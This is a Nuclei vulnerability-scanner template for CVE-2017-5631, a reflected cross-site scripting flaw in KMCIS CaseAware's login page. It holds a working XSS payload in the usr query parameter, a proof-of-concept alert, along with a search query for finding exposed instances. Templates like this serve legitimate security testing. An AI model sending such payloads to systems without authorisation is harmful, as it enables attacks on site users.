nuclei-templates/http/cves/2017/CVE-2017-5631.yaml

53 lines
2.0 KiB
YAML

id: CVE-2017-5631
info:
name: KMCIS CaseAware - Cross-Site Scripting
author: edoardottt
severity: medium
description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: |
To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor.
reference:
- https://www.openbugbounty.org/incidents/228262/
- https://www.exploit-db.com/exploits/42042/
- https://nvd.nist.gov/vuln/detail/CVE-2017-5631
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-5631
cwe-id: CWE-79
epss-score: 0.00286
epss-percentile: 0.68687
cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: kmc_information_systems
product: caseaware
fofa-query: title="caseaware"
tags: cve2017,cve,edb,xss,caseaware,kmc_information_systems
http:
- method: GET
path:
- "{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'></script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a0046304402204bfed1bb3dad739a1ef9947e49b189c36f2e6b0b1d6f845ce934981c33f2633302202ba6d95bcd7b94e5cf7c6db6480c3a72fa840646907405d0f5cc57b7dfb6c1ff:922c64590222798bb761d5b6d8e72950